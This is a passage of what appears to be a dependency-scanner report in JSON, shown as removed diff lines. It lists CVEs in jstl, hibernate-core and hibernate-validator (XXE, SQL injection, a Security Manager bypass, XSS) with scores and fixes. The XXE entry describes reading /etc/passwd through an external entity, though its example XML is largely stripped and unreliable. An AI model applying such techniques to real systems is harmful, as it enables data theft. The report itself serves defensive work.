"2024-03-11T09:45:52.623697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", - "epssDetails": { - "percentile": "0.94002", - "probability": "0.07046", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-0254" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-6x4w-8w53-xrvv" - ] - }, - "packageName": "javax.servlet:jstl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.341000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-02-27T16:13:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "javax.servlet", - "artifactId": "jstl" - }, - "publicationTime": "2015-02-27T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.017447Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "javax.servlet:jstl", - "version": "1.2" - }, - { - "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", - "type": "license", - "title": "CDDL-1.0 license", - "semver": { - "vulnerable": [ - "[1.2,)" - ] - }, - "license": "CDDL-1.0", - "language": "java", - "description": "CDDL-1.0 license", - "packageName": "javax.servlet:jstl", - "creationTime": "2024-06-18T08:06:13.191Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T08:06:13.191Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "javax.servlet:jstl", - "version": "1.2" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", - "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-30098", - "title": "JSM bypass via ReflectionHelper", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[4.1.0.Beta1, 4.3.2.Final)", - "[5.0.0.Final,5.1.2.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.3.2.Final", - "5.1.2.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", - "title": "GitHub Commit" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-912", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/CVE-2014-3558", - "title": "Redhat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:48.734535Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", - "epssDetails": { - "percentile": "0.70800", - "probability": "0.00319", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3558" - ], - "CWE": [ - "CWE-592" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2016-12-25T16:51:53Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2014-07-17T16:51:53Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2014-07-17T16:51:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:45.778673Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-validator@6.0.23.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-568162", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Alvaro Muñoz" - ], - "semver": { - "vulnerable": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "6.0.19.Final", - "6.1.3.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", - "className": "ValidatorImpl", - "functionName": "validate" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/pull/1071", - "title": "GitHub PR" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-1758", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:37.379564Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", - "epssDetails": { - "percentile": "0.49937", - "probability": "0.00139", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10693" - ], - "CWE": [ - "CWE-20" - ], - "GHSA": [ - "GHSA-rmrm-75hp-phr2" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-05T12:05:58.541980Z", - "functions_new": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.engine.ValidatorImpl", - "functionName": "validate" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-05T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-05-05T16:32:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.490090Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-validator@6.0.23.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-569100", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "6.0.18.Final", - "6.1.0.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", - "className": "SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", - "title": "GitHub Commit" - }, - { - "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", - "title": "Hibernator Security Release Blog" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:47.749976Z" - }, - { - "type": "secondary", - "vector": 